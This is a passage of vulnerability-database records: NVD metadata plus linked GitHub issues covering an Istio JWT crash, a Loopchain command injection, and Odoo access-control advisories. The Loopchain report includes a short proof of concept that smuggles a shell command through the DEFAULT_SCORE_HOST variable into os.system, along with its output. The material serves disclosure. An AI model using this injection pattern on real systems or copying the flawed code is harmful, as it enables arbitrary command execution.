3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/istio/istio.io/pull/4555" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/istio/istio/issues/15084" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://istio.io/about/notes/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/istio/istio.io/pull/4555" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/istio/istio/issues/15084" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://istio.io/about/notes/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:istio:istio:*:*:*:*:*:*:*:*", "matchCriteriaId": "1518059F-A22C-4DB3-8A46-C565F7024F00", "versionEndExcluding": "1.2.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/istio/istio/issues/15084
[ "Third Party Advisory" ]
github.com
[ "istio", "istio" ]
**Bug description** I'm trying to implement service to service JWT authentication like something shown in [this](https://github.com/auth0-samples/auth0-api-auth-samples/tree/master/machine-to-machine) repo. While it's working fine with Auth0, I'm having trouble while setting it up with my company's authentication service. I made the service architecture by following [this ](https://medium.com/google-cloud/back-to-microservices-with-istio-p1-827c872daa53)article, you can see my repository [here](https://github.com/divya21raj/Istio-Powered-Sentiment-Analysis). This is the policy I'm applying -> ``` apiVersion: authentication.istio.io/v1alpha1 kind: Policy metadata: name: auth-policy spec: targets: - name: sa-web-app origins: - jwt: issuer: "My-Issuer" jwksUri: "http://10.0.75.1:8080/pub_key.json" principalBinding: USE_ORIGIN ``` I'm hosting the public key locally, you can find it [here](https://raw.githubusercontent.com/divya21raj/Istio-Powered-Sentiment-Analysis/master/pub_key.json) too. If I hit the service with an invalid access key (say it's expired), I'm getting a 401 as expected, but a valid access key gives a `503: upstream connect error or disconnect/reset before headers. reset reason: connection failure` Upon checking the logs for the envoy proxy of the publisher pod, I can see this -> `Epoch 0 terminated with an error: signal: segmentation fault (core dumped)` This log message isn't there when working successfully with Auth0, so I think this might be a hint. But looking at the lines in the source code where this log message is present, I can't figure out much.... One reason I think this might occur is the different keys in access token I'm passing. The Auth0 access token has the following keys -> ``` { "iss": "https://xyz-sa.auth0.com/", "sub": "0BH7c261T8X0nt9b9B3UE4mP0L5O057V@clients", "aud": "https://sentiment-analysis.io/webapp", "iat": 1561353753, "exp": 1561440153, "azp": "0BH7c261T8X0nt9b9B3UE4mP0L5O057V", "gty": "client-credentials" } ``` And my access token looks like this -> ``` { "http://www.xyz.com/identity/claims/tenancy/slug": "4d8ad062-7f6d-4b4d-9a64-f1c3627a97b4", "subtype": "app", "nbf": 1561353003, "exp": 1561354803, "iss": "xyz.com" } ``` Anybody has any ideas, I've been stuck for quite some time now, any help will be appreciated..! **Affected product area (please put an X in all that apply)** [ ] Configuration Infrastructure [ ] Docs [ ] Installation [ ] Networking [ ] Performance and Scalability [x] Policies and Telemetry [x] Security [ ] Test and Release [ ] User Experience [ ] Developer Infrastrcture **Expected behavior** 200 on valid Access Token **Steps to reproduce the bug** Sadly not possible, as the access token I'm using is private to my company :( **Version (include the output of `istioctl version --remote` and `kubectl version`)** `version.BuildInfo{Version:"1.1.7", GitRevision:"eec7a74473deee98cad0a996f41a32a47dd453c2", User:"root", Host:"341b3bf0-76ac-11e9-b644-0a580a2c0404", GolangVersion:"go1.10.4", DockerHub:"docker.io/istio", BuildStatus:"Clean", GitTag:"1.1.6-6-geec7a74"} ` ``` Client Version: version.Info{Major:"1", Minor:"14", GitVersion:"v1.14.0", GitCommit:"641856db18352033a0d96dbc99153fa3b27298e5", GitTreeState:"clean", BuildDate:"2019-03-25T15:53:57Z", GoVersion:"go1.12.1", Compiler:"gc", Platform:"windows/amd64"} Server Version: version.Info{Major:"1", Minor:"13", GitVersion:"v1.13.0", GitCommit:"ddf47ac13c1a9483ea035a79cd7c10005ff21a6d", GitTreeState:"clean", BuildDate:"2018-12-03T20:56:12Z", GoVersion:"go1.11.2", Compiler:"gc", Platform:"linux/amd64"} ``` **How was Istio installed?** Helm template, I followed [this](https://medium.com/google-cloud/back-to-microservices-with-istio-p1-827c872daa53) article. **Environment where bug was observed (cloud vendor, OS, etc)** Windows 10, running the cluster on Minikube. Additionally, please consider attaching a [cluster state archive](http://istio.io/help/bugs/#generating-a-cluster-state-archive [istio-dump.tar.gz](https://github.com/istio/istio/files/3319351/istio-dump.tar.gz) ) by attaching the dump file to this issue.
JWT authentication causing "Epoch 0 terminated with an error" in Envoy
https://api.github.com/repos/istio/istio/issues/15084/comments
6
2019-06-24T05:36:31Z
2019-06-28T21:34:53Z
https://github.com/istio/istio/issues/15084
459,696,678
15,084
445
CVE-2019-12997
2019-06-28T14:15:09.063
In Loopchain through 2.2.1.3, an attacker can escalate privileges from a low-privilege shell by changing the environment (aka injection in the DEFAULT_SCORE_HOST environment variable).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/icon-project/loopchain/issues/231" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/icon-project/loopchain/issues/231" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:icon:loopchain:*:*:*:*:*:*:*:*", "matchCriteriaId": "EE404E41-7702-4A62-909D-287D1F4D10D4", "versionEndExcluding": null, "versionEndIncluding": "2.2.1.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/icon-project/loopchain/issues/231
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "icon-project", "loopchain" ]
## Description: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. ## Details: An attacker can manipulate DEFAULT_SCORE_HOST which is trusted user supplied input, this can be used to inject commands and gain arbitrary code execution. ## Affected URL: https://github.com/icon-project/loopchain/blob/2ab4734138d6a2a480a08ee023b2f4d74679ed43/loopchain/__main__.py ## Affected Code: `if os.getenv('DEFAULT_SCORE_HOST') is not None: os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> /root/.ssh/known_hosts")` ## Reference: https://www.owasp.org/index.php/Command_Injection ## Example/PoC: ``` import os os.environ['DEFAULT_SCORE_HOST'] = ';ip addr;' os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> ~/.ssh/known_hosts") usage: ssh-keyscan [-46cHv] [-f file] [-p port] [-T timeout] [-t type] [host | addrlist namelist] ... 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 00:0c:29:8c:ab:b0 brd ff:ff:ff:ff:ff:ff inet 172.16.12.139/24 brd 172.16.12.255 scope global dynamic noprefixroute ens33 valid_lft 1156sec preferred_lft 1156sec inet6 fe80::f8e1:1ae5:174a:ea03/64 scope link noprefixroute valid_lft forever preferred_lft forever 0 ```
Command Injection (Privilege Escalation)
https://api.github.com/repos/icon-project/loopchain/issues/231/comments
11
2019-06-20T07:49:55Z
2019-06-30T01:34:40Z
https://github.com/icon-project/loopchain/issues/231
458,407,377
231
446
CVE-2018-14867
2019-06-28T18:15:10.410
Incorrect access control in the portal messaging system in Odoo Community 9.0 and 10.0 and Odoo Enterprise 9.0 and 10.0 allows remote attackers to post messages on behalf of customers, and to guess document attribute values, via crafted parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32503" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32503" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "284" ]
284
https://github.com/odoo/odoo/issues/32503
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-3 Incorrect access control in the portal messaging system in Odoo Community 9.0 and 10.0 and Odoo Enterprise 9.0 and 10.0 allows remote attackers to post messages on behalf of customers, and to guess document attribute values, via crafted parameters. **Affects**: Odoo 9.0, 10.0 (Community and Enterprise Editions) **Component**: website_mail **Credits**: Nils Hamerlinck (Trobz), Naglis Jonaitis, Andrew Grasso **CVE ID**: [CVE-2018-14867](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14867) ## I. Background Odoo's messaging engine allows visitors on the website to post messages on existing documents. That mechanism is used to chat with unauthenticated users or to allow portal users to comment on their documents such as orders or tickets. This feature is limited by a security check that only allow users to post on documents when they have received a direct secure link to the document. ## II. Problem Description A programming error in the security check of the message post feature makes it easy to circumvent. It can also turn it into a vector for leaking limited information about arbitrary documents. ## III. Impact **Attack Vector**: Network exploitable **Authentication**: No user account required **CVSS3 Score**: Medium :: 6.5 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) A remote unauthenticated attacker could craft a request in order to post messages on any document of the database which includes a message history, as if they had been posted by the customer linked to the document. This attack also allows the attacker to guess, by trial and error, the value of a limited number of fields on such document. This is mitigated by the fact that it is very time consuming and will cause messages to be posted on the document. Odoo S.A. is not aware of any use of this vulnerability in the wild. ## IV. Workaround No workaround is available, applying the patch is strongly recommended. Uninstalling the "website_mail" module can prevent exploiting this vulnerability, at the expense of making some parts of the Odoo deployment stop working (depending on the version and other modules installed). Odoo Online servers have been patched as soon as the correction was available. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 9.0: 6033439c67d696f5accb7e17ac42de6f9c0bd0b3 - 10.0: e00370e194ffa0c527bb4669401949cc6a15f55f - 10.0-ent and 9.0-ent (Enterprise): see 10.0 and 9.0. The version 11.0 is not impacted by this vulnerability.
[SEC] ODOO-SA-2018-08-07-3 (CVE-2018-14867) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32503/comments
0
2019-04-08T13:37:31Z
2019-04-08T13:37:33Z
https://github.com/odoo/odoo/issues/32503
430,456,556
32,503
447
CVE-2018-14868
2019-06-28T18:15:10.473
Incorrect access control in the Password Encryption module in Odoo Community 9.0 and Odoo Enterprise 9.0 allows authenticated users to change the password of other users without knowing their current password via a crafted RPC call.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32507" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32507" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/odoo/odoo/issues/32507
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-7 Incorrect access control in the Password Encryption module in Odoo Community 9.0 and Odoo Enterprise 9.0 allows authenticated users to change the password of other users without knowing their current password via a crafted RPC call. **Affects**: Odoo 9.0 (Community and Enterprise Editions) **Component**: auth_crypt module **Credits**: Nils Hamerlinck (Trobz) **CVE ID**: [CVE-2018-14868](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14868) ## I. Background As of Odoo 8.0, when local passwords are used, the passwords are stored by default as salted cryptographic hashes (derived via PBKDF2 using SHA-512 hashing). This is provided by the "Password Encryption" module (auth_crypt), which is automatically installed. ## II. Problem Description Improper access control in the auth_crypt module allows authenticated users to change user passwords without any control. ## III. Impact Access Vector: Network exploitable Access Complexity: Low **Authentication**: User account required **CVSS3 Score**: High :: 8.1 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) By crafting a malicious RPC request, remote authenticated attackers (including portal users) could force a chosen password on any user, without knowing their current password. Odoo S.A. is not aware of any malicious use of this vulnerability. ## IV. Workaround There is no known workaround, other than restricting remote access to the system to trustworthy network addresses only. Uninstalling the "Password Encryption" module (auth_crypt) would work too, with the side-effect of denying access to all users currently authenticated with hashed passwords. Odoo Online servers have been patched as soon as the correction was available. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 9.0: e9624a846048188e5282f65926f98dc297467245 - 9.0-ent (Enterprise): see 9.0. Versions 10.0 and later are not impacted by this vulnerability.
[SEC] ODOO-SA-2018-08-07-7 (CVE-2018-14868) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32507/comments
0
2019-04-08T13:37:42Z
2019-04-08T13:37:43Z
https://github.com/odoo/odoo/issues/32507
430,456,652
32,507
448
CVE-2018-14885
2019-06-28T18:15:10.520
Incorrect access control in the database manager component in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows a remote attacker to restore a database dump without knowing the super-admin password. An arbitrary password succeeds.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32512" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32512" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*", "matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "284" ]
284
https://github.com/odoo/odoo/issues/32512
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-12 Incorrect access control in the database manager component in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows a remote attacker to restore a database dump without knowing the super-admin password. An arbitrary password succeeds. **Affects**: Odoo 10.0, 11.0 (Community and Enterprise Editions) **Component**: Database Manager **Credits**: Yenthe Van Ginneken and Erwin van der Ploeg (Odoo Experts) **CVE ID**: [CVE-2018-14885](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14885) ## I. Background Odoo provides an interface to manage databases, and create, backup and restore databases, in order to ease testing and development tasks. Access to these sensitive operations is normally protected by a super-admin password, chosen by the system administrator. ## II. Problem Description A programming error in the database restore feature rendered the super-admin password protection ineffective. ## III. Impact Access Vector: Network exploitable Access Complexity: Low **Authentication**: Public **CVSS3 Score**: High :: 8.2 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H) When the database manager screen is not deactivated, an attacker could restore a database backup without knowning the super-admin password. This would allow the injection of data, and the execution of requests on the server with local database administration privileges. On a properly configured server, this could degrade the performance of the targeted server without gaining any access on the other databases on the server. Odoo S.A. is not aware of any malicious use of this vulnerability. ## IV. Workaround Only servers with the database manager enabled are vulnerable to this issue. On production servers, deactivating the database manager will prevent attackers from abusing the issue, and is strongly recommended. See also the Odoo Deployment Guide: https://www.odoo.com/documentation/11.0/setup/deploy.html Revoking database creation rights for the PostgreSQL user configured for the Odoo service will also prevent the attack. Odoo Cloud servers are not vulnerable to this issue, because the database manager is not enabled. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 10.0: b0203084133bee0dadc004debf3b0fb2835d0ffd - 11.0: 5decf4ab3da7484f8418d648688fbe4250ea7fdd - 11.0-ent and 10.0-ent (Enterprise): see 11.0 and 10.0. The version 9.0 is not impacted by this vulnerability.
[SEC] ODOO-SA-2018-08-07-12 (CVE-2018-14885) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32512/comments
0
2019-04-08T13:37:55Z
2019-04-08T13:37:57Z
https://github.com/odoo/odoo/issues/32512
430,456,776
32,512
449
CVE-2018-14886
2019-06-28T18:15:10.567
The module-description renderer in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier does not disable RST's local file inclusion, which allows privileged authenticated users to read local files via a crafted module description.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32513" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32513" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": 